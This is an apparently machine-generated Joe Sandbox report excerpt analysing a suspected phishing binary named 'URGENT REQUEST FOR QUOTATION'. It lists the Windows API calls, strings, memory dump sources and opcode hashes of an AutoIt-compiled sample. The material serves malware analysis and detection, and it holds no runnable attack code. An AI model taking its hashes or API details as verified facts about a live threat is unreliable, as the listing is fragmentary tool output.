                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00091C46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                      • Opcode ID: b073f467cc7035638443f084982538420eec2bab987c8def3a6254ad2d5949c5
                                                                                                                      • Instruction ID: c3f19aea89b4fa0db0f60621f082e408bfed9b825b981aef5d9d50f1dc6043df
                                                                                                                      • Opcode Fuzzy Hash: b073f467cc7035638443f084982538420eec2bab987c8def3a6254ad2d5949c5
                                                                                                                      • Instruction Fuzzy Hash: D901A2B5B851096ADF15EBA0CE52EFF77EC9F51340F140019B916672C2EA70AE08E7B1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00091CC8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                      • Opcode ID: 33674f9a28cc30d740f0e800b7203a9c9fea02b3a9b6abf1ca23d7da1b1dafbd
                                                                                                                      • Instruction ID: 024ce599bdb4089758a28438e3e6c3f54b5be5e5851129f8ce2c4d47d48dbf05
                                                                                                                      • Opcode Fuzzy Hash: 33674f9a28cc30d740f0e800b7203a9c9fea02b3a9b6abf1ca23d7da1b1dafbd
                                                                                                                      • Instruction Fuzzy Hash: 6E01ADB5B8011966DF15EBA0CA02EFE77EC9B11340F540025B906B72C2EAA09F08E6B1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00091DD3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                      • Opcode ID: 106f640b5bd3a6cd10f604d21c54a41e43c4e5c28a47624eef2295fe458cb9a8
                                                                                                                      • Instruction ID: c1c2085fa7ca9470441f71fe3935cc54f79c88a08129ffb4484263e525d74e8c
                                                                                                                      • Opcode Fuzzy Hash: 106f640b5bd3a6cd10f604d21c54a41e43c4e5c28a47624eef2295fe458cb9a8
                                                                                                                      • Instruction Fuzzy Hash: CAF0F471B4121966DF15E7A4CD52EFF77ACAF01340F040915B922A72C2DAB0590896A0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen
                                                                                                                      • String ID: 3, 3, 16, 1
                                                                                                                      • API String ID: 176396367-3042988571
                                                                                                                      • Opcode ID: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                                                      • Instruction ID: efb95153b906ceb65668031241f52209e4d6d6e094c974f2140b0704b9824aca
                                                                                                                      • Opcode Fuzzy Hash: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                                                                                                      • Instruction Fuzzy Hash: 8FE09B1661522024927112799CC29FF56C9DFC5752714182BFE89C2267EB94CDD193A1
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00090B23
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 2030045667-4017498283
                                                                                                                      • Opcode ID: 1557ca93536f779b17bb0e6d4a8eb745d4a5f8db249ba0e3fa37a9323f382551
                                                                                                                      • Instruction ID: 4b7310273797221a175f82a3283486e221c52265c20df2247daa419c19667d45
                                                                                                                      • Opcode Fuzzy Hash: 1557ca93536f779b17bb0e6d4a8eb745d4a5f8db249ba0e3fa37a9323f382551
                                                                                                                      • Instruction Fuzzy Hash: 15E0D8312483083AE2143754BC03FDD7A84CF05B15F10442AFB8C598C38AE2249056AD
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0004F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00050D71,?,?,?,0003100A), ref: 0004F7CE
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,0003100A), ref: 00050D75
                                                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0003100A), ref: 00050D84
                                                                                                                      Strings
                                                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00050D7F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                      • API String ID: 55579361-631824599
                                                                                                                      • Opcode ID: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                                                      • Instruction ID: 2043778dbd4ae73c1cbb23d61b3e0be130f6dfa3a1c594e5f4f39979ad2d11f0
                                                                                                                      • Opcode Fuzzy Hash: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                                                                                                      • Instruction Fuzzy Hash: 97E012742007528BE3749FB8D504B9B7BF5BF04745F048D2DE886C7652DBB9E4488BA1
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000A302F
                                                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 000A3044
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                                                                                                      • Instruction ID: bd32a276fbfac23f5fb68cde1c9268479b263714edd4c0c7418d7144954ac114
                                                                                                                      • Opcode Fuzzy Hash: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                                                                                                      • Instruction Fuzzy Hash: 66D05E7250032867EA20E7A4EC0EFDB3A6CDB04750F0002A1B759E6091DAB49984CAD0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime
                                                                                                                      • String ID: %.3d$X64
                                                                                                                      • API String ID: 481472006-1077770165
                                                                                                                      • Opcode ID: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                                                                                                      • Instruction ID: d7a5d76dcd4e4438d37f64d2fadd7cce224b589ce0241ed945bd575da81bb041
                                                                                                                      • Opcode Fuzzy Hash: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                                                                                                      • Instruction Fuzzy Hash: 62D012A1808119F9CB60A7D0DC49DBDB37CFB28301F508563F94A92080D624C5086765
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C232C
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000C233F
                                                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                                                                                                      • Instruction ID: b366250a1b7fd531f4fe5c66ca88db9566a9639d639d933fcfc90b11031d30e5
                                                                                                                      • Opcode Fuzzy Hash: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                                                                                                      • Instruction Fuzzy Hash: 7AD01236794350B7F664B771DC0FFD67A149B00B14F004916B74AEA1D1C9F9A841DB54
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C236C
                                                                                                                      • PostMessageW.USER32(00000000), ref: 000C2373
                                                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                                                                                                      • Instruction ID: 78ddd81c65cbb5c419173e7460aa116da7a6d74a226305ad84585e3891810fbd
                                                                                                                      • Opcode Fuzzy Hash: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                                                                                                      • Instruction Fuzzy Hash: 58D0C9327953507AF664B771DC0FFC676149B04B14F004916B74AEA1D1C9B9A8419A54
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0006BE93
                                                                                                                      • GetLastError.KERNEL32 ref: 0006BEA1
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006BEFC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1717984340-0
                                                                                                                      • Opcode ID: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
                                                                                                                      • Instruction ID: d02b1d0132bca92bc11f9ef8e2377df5001671b16985fe06fa05b1d2c27f2ab3
                                                                                                                      • Opcode Fuzzy Hash: 1f3773ace06fedd3c870104a1e1489b057c507dc40165f32c8aead744de13471
                                                                                                                      • Instruction Fuzzy Hash: 4E41E4B5600206AFDF718FA5CC44ABA7BE6AF42310F144179F959D71B1DB318D81CB60